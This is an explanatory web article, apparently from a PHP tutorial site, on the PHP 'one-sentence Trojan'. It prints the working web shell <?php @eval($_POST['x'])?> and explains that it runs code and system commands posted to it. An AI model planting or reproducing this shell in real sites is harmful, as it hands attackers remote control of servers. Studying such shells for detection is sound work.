Home >Backend Development >PHP Problem >How to parse a picture Trojan in one sentence in PHP

How to parse a picture Trojan in one sentence in PHP

王林
王林Original
2019-09-16 17:58:569482browse

How to parse a picture Trojan in one sentence in PHP

One sentence Trojan analysis

First of all, when learning to penetrate, there are probably three types of Trojans: big horses, small horses, and one sentence.

Common words:

<?php @eval($_POST[&#39;x&#39;])?>

This should be the most common...Look at its composition.

The first is an eval function, followed by post submitting a value with parameter x. First, let’s look at what the eval function does.

Official description:

The eval() function calculates the string according to the PHP code.

The string must be legal PHP code and must end with a semicolon.

If no return statement is called in the code string, NULL is returned. If there are parsing errors in the code, the eval() function returns false.

Grammar:

eval(phpcode)

To put it simply, it can execute some php functions and php code. This is enough.
This way we can understand it It's much simpler. Wouldn't it be better if we directly send some PHP code to his post?
For example: phpinfo() function, system function, etc.

How to parse a picture Trojan in one sentence in PHP

#You can see that the phpinfo function I have here has been executed.

Command execution is also possible

How to parse a picture Trojan in one sentence in PHP

PHP code can also be executed smoothly:

How to parse a picture Trojan in one sentence in PHP

Recommended video Tutorial: PHP Video Tutorial

The above is the detailed content of How to parse a picture Trojan in one sentence in PHP. For more information, please follow other related articles on the PHP Chinese website!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn